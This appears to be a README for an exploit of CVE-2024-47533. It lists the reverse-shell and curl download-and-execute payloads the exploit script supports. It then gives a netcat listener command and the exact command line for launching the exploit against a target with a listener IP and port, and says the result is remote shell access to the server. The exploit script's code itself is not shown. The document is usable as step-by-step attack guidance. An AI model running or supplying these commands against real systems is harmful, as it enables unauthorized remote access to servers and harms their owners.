💥 Example Payloads
The exploit script supports various reverse shell payloads including:
- Bash reverse shell
- Netcat shells (
nc,nc2) - Python reverse shell
- Curl download & execute
🔬 Proof-of-Concept (PoC) Demonstration
Github Repo link
📡 Preparing the Listener
Start a Netcat listener on your machine:
nc -lvnp 4444

🚀 Launching the Exploit
Run the exploit script CVE-2024-47533-dbs.py.
python3 CVE-2024-47533-dbs.py -t http://127.0.0.1:25151 -l 10.10.15.16 -p 4444 --payload bash

💻 Successful Remote Shell Access
Upon successful execution, the reverse shell will connect back to the listener, granting the attacker remote access to the server.
